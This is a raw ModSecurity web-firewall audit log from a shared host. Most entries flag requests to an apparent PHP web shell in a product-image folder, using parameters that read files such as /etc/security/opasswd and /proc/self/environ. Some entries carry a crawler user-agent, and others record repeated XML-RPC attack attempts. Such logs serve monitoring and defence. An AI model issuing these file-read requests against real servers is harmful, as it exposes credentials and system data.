Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --db1d901b-Z-- --f07c071f-A-- [17/Jun/2025:00:56:30.681892 +0530] aFBv5h6Azi2u_ik2Q3KuRAAAAAY 216.73.216.71 43816 127.0.0.1 7081 --f07c071f-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fsnap%2Fcore20%2F2582%2Fetc%2Fsecurity&viewfile=%2F%2Fsnap%2Fcore20%2F2582%2Fetc%2Fsecurity%2Fopasswd HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --f07c071f-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2992 Connection: close Content-Type: text/html; charset=UTF-8 --f07c071f-H-- Message: Warning. Matched phrase "etc/security/opasswd" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/security/opasswd found within ARGS:viewfile: /snap/core20/2582/etc/security/opasswd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/security/opasswd" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/security/opasswd found within ARGS:viewfile: /snap/core20/2582/etc/security/opasswd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBv5h6Azi2u_ik2Q3KuRAAAAAY"] Apache-Handler: application/x-httpd-php Stopwatch: 1750101990676309 5654 (- - -) Stopwatch2: 1750101990676309 5654; combined=3264, p1=479, p2=2600, p3=55, p4=52, p5=78, sr=122, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f07c071f-Z-- --c6f6522e-A-- [17/Jun/2025:00:56:32.995991 +0530] aFBv6Ml682-knofG8qdV3wAAAAM 216.73.216.71 44210 127.0.0.1 7081 --c6f6522e-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fself%2Froot%2Fetc%2Fsecurity&viewfile=%2F%2Fproc%2Fself%2Froot%2Fetc%2Fsecurity%2Fpam_env.conf HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --c6f6522e-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 4409 Connection: close Content-Type: text/html; charset=UTF-8 --c6f6522e-H-- Message: Warning. Matched phrase "etc/security/pam_env.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/security/pam_env.conf found within ARGS:viewfile: /proc/self/root/etc/security/pam_env.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/security/pam_env.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/security/pam_env.conf found within ARGS:viewfile: /proc/self/root/etc/security/pam_env.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBv6Ml682-knofG8qdV3wAAAAM"] Apache-Handler: application/x-httpd-php Stopwatch: 1750101992991404 4644 (- - -) Stopwatch2: 1750101992991404 4644; combined=2478, p1=447, p2=1896, p3=42, p4=37, p5=56, sr=99, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c6f6522e-Z-- --d9115f60-A-- [17/Jun/2025:00:56:40.643215 +0530] aFBv8BwcFb_n1P0IC9xqmAAAAAo 216.73.216.71 49120 127.0.0.1 7081 --d9115f60-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fself%2Froot%2Fetc%2Fskel&viewfile=%2F%2Fproc%2Fself%2Froot%2Fetc%2Fskel%2F.profile HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --d9115f60-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3365 Connection: close Content-Type: text/html; charset=UTF-8 --d9115f60-H-- Message: Warning. Matched phrase ".profile" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: .profile found within ARGS:viewfile: /proc/self/root/etc/skel/.profile"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: .profile found within ARGS:viewfile: /proc/self/root/etc/skel/.profile"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBv8BwcFb_n1P0IC9xqmAAAAAo"] Apache-Handler: application/x-httpd-php Stopwatch: 1750102000638875 4396 (- - -) Stopwatch2: 1750102000638875 4396; combined=2280, p1=348, p2=1791, p3=39, p4=39, p5=63, sr=95, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d9115f60-Z-- --a3cac076-A-- [17/Jun/2025:00:57:04.203899 +0530] aFBwB5VkCcfT-Z8NQYyZ-wAAAAc 34.68.37.79 55020 127.0.0.1 7081 --a3cac076-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 34.68.37.79 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 492 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --a3cac076-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --a3cac076-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 34.68.37.79 (86+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 34.68.37.79 (86+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aFBwB5VkCcfT-Z8NQYyZ-wAAAAc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750102023549506 654469 (- - -) Stopwatch2: 1750102023549506 654469; combined=2608, p1=398, p2=1655, p3=61, p4=134, p5=222, sr=117, sw=138, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a3cac076-Z-- --db0e392e-A-- [17/Jun/2025:00:58:04.328197 +0530] aFBwQ5lL5_2Zd8wUdfLObAAAAAg 34.68.37.79 57828 127.0.0.1 7081 --db0e392e-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 34.68.37.79 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 490 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --db0e392e-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --db0e392e-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 34.68.37.79 (86+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 34.68.37.79 (86+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aFBwQ5lL5_2Zd8wUdfLObAAAAAg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750102083663412 664872 (- - -) Stopwatch2: 1750102083663412 664872; combined=2555, p1=433, p2=1607, p3=56, p4=76, p5=243, sr=144, sw=140, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --db0e392e-Z-- --0c72e732-A-- [17/Jun/2025:00:58:29.575527 +0530] aFBwXRwcFb_n1P0IC9xq-wAAAAo 216.73.216.71 43296 127.0.0.1 7081 --0c72e732-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fself%2Froot%2Fetc%2Fsecurity&viewfile=%2F%2Fproc%2Fself%2Froot%2Fetc%2Fsecurity%2Flimits.conf HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --0c72e732-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3749 Connection: close Content-Type: text/html; charset=UTF-8 --0c72e732-H-- Message: Warning. Matched phrase "etc/security/limits" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/security/limits found within ARGS:viewfile: /proc/self/root/etc/security/limits.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/security/limits" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/security/limits found within ARGS:viewfile: /proc/self/root/etc/security/limits.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBwXRwcFb_n1P0IC9xq-wAAAAo"] Apache-Handler: application/x-httpd-php Stopwatch: 1750102109571544 4037 (- - -) Stopwatch2: 1750102109571544 4037; combined=2135, p1=350, p2=1656, p3=34, p4=34, p5=61, sr=86, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --0c72e732-Z-- --247f6b67-A-- [17/Jun/2025:00:59:03.895724 +0530] aFBwfxwcFb_n1P0IC9xrEQAAAAo 34.68.37.79 41306 127.0.0.1 7081 --247f6b67-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 34.68.37.79 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 494 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --247f6b67-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --247f6b67-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 34.68.37.79 (85+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 34.68.37.79 (85+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aFBwfxwcFb_n1P0IC9xrEQAAAAo"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750102143242334 653450 (- - -) Stopwatch2: 1750102143242334 653450; combined=2346, p1=357, p2=1600, p3=55, p4=69, p5=165, sr=101, sw=100, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --247f6b67-Z-- --0d002001-A-- [17/Jun/2025:00:59:07.765565 +0530] aFBwg5VkCcfT-Z8NQYyaXwAAAAc 216.73.216.71 41848 127.0.0.1 7081 --0d002001-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fself%2Froot%2Fproc%2Fself&viewfile=%2F%2Fproc%2Fself%2Froot%2Fproc%2Fself%2Fenviron HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --0d002001-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2973 Connection: close Content-Type: text/html; charset=UTF-8 --0d002001-H-- Message: Warning. Matched phrase "proc/self/environ" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/environ found within ARGS:viewfile: /proc/self/root/proc/self/environ"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/environ" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/environ found within ARGS:viewfile: /proc/self/root/proc/self/environ"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBwg5VkCcfT-Z8NQYyaXwAAAAc"] Apache-Handler: application/x-httpd-php Stopwatch: 1750102147761256 4365 (- - -) Stopwatch2: 1750102147761256 4365; combined=2231, p1=359, p2=1726, p3=36, p4=45, p5=64, sr=96, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --0d002001-Z-- --0d175928-A-- [17/Jun/2025:00:59:12.316797 +0530] aFBwiH3hoSwVUy254pH55wAAACQ 216.73.216.71 59228 127.0.0.1 7081 --0d175928-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fsnap%2Fcore20%2F2599%2Fetc%2Fskel&viewfile=%2F%2Fsnap%2Fcore20%2F2599%2Fetc%2Fskel%2F.profile HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --0d175928-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3371 Connection: close Content-Type: text/html; charset=UTF-8 --0d175928-H-- Message: Warning. Matched phrase ".profile" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: .profile found within ARGS:viewfile: /snap/core20/2599/etc/skel/.profile"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: .profile found within ARGS:viewfile: /snap/core20/2599/etc/skel/.profile"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBwiH3hoSwVUy254pH55wAAACQ"] Apache-Handler: application/x-httpd-php Stopwatch: 1750102152311613 5254 (- - -) Stopwatch2: 1750102152311613 5254; combined=2882, p1=446, p2=2260, p3=51, p4=43, p5=82, sr=125, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --0d175928-Z-- --ed940d4a-A-- [17/Jun/2025:00:59:20.601328 +0530] aFBwkJlL5_2Zd8wUdfLOtQAAAAg 216.73.216.71 35750 127.0.0.1 7081 --ed940d4a-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fsnap%2Fcore20%2F2582%2Fetc%2Fsecurity&viewfile=%2F%2Fsnap%2Fcore20%2F2582%2Fetc%2Fsecurity%2Flimits.conf HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --ed940d4a-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3755 Connection: close Content-Type: text/html; charset=UTF-8 --ed940d4a-H-- Message: Warning. Matched phrase "etc/security/limits" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/security/limits found within ARGS:viewfile: /snap/core20/2582/etc/security/limits.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/security/limits" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/security/limits found within ARGS:viewfile: /snap/core20/2582/etc/security/limits.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBwkJlL5_2Zd8wUdfLOtQAAAAg"] Apache-Handler: application/x-httpd-php Stopwatch: 1750102160596841 4542 (- - -) Stopwatch2: 1750102160596841 4542; combined=2270, p1=326, p2=1808, p3=38, p4=40, p5=58, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ed940d4a-Z-- --174ccd7c-A-- [17/Jun/2025:00:59:22.060776 +0530] aFBwkkcTB7P_sALtclDvKQAAAAI 216.73.216.71 35952 127.0.0.1 7081 --174ccd7c-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fself%2Froot%2Fetc%2Fsecurity&viewfile=%2F%2Fproc%2Fself%2Froot%2Fetc%2Fsecurity%2Fopasswd HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --174ccd7c-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2986 Connection: close Content-Type: text/html; charset=UTF-8 --174ccd7c-H-- Message: Warning. Matched phrase "etc/security/opasswd" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/security/opasswd found within ARGS:viewfile: /proc/self/root/etc/security/opasswd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/security/opasswd" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/security/opasswd found within ARGS:viewfile: /proc/self/root/etc/security/opasswd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBwkkcTB7P_sALtclDvKQAAAAI"] Apache-Handler: application/x-httpd-php Stopwatch: 1750102162056933 3896 (- - -) Stopwatch2: 1750102162056933 3896; combined=2170, p1=367, p2=1683, p3=35, p4=33, p5=52, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --174ccd7c-Z-- --52f2f126-A-- [17/Jun/2025:01:00:03.981004 +0530] aFBwu0cTB7P_sALtclDvRAAAAAI 216.73.216.71 48344 127.0.0.1 7081 --52f2f126-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fsnap%2Fcore20%2F2582%2Fetc%2Fskel&viewfile=%2F%2Fsnap%2Fcore20%2F2582%2Fetc%2Fskel%2F.profile HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --52f2f126-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3371 Connection: close Content-Type: text/html; charset=UTF-8 --52f2f126-H-- Message: Warning. Matched phrase ".profile" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: .profile found within ARGS:viewfile: /snap/core20/2582/etc/skel/.profile"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: .profile found within ARGS:viewfile: /snap/core20/2582/etc/skel/.profile"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBwu0cTB7P_sALtclDvRAAAAAI"] Apache-Handler: application/x-httpd-php Stopwatch: 1750102203975173 5913 (- - -) Stopwatch2: 1750102203975173 5913; combined=3259, p1=477, p2=2594, p3=57, p4=48, p5=83, sr=119, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --52f2f126-Z-- --6f929450-A-- [17/Jun/2025:01:00:04.151779 +0530] aFBwu1JfblPUQiSn5r1ncQAAAAA 34.68.37.79 48282 127.0.0.1 7081 --6f929450-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 34.68.37.79 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 497 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --6f929450-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --6f929450-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 34.68.37.79 (87+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 34.68.37.79 (87+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aFBwu1JfblPUQiSn5r1ncQAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750102203402930 748917 (- - -) Stopwatch2: 1750102203402930 748917; combined=2771, p1=466, p2=1808, p3=51, p4=91, p5=217, sr=126, sw=138, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6f929450-Z-- --9769d93b-A-- [17/Jun/2025:01:00:13.815357 +0530] 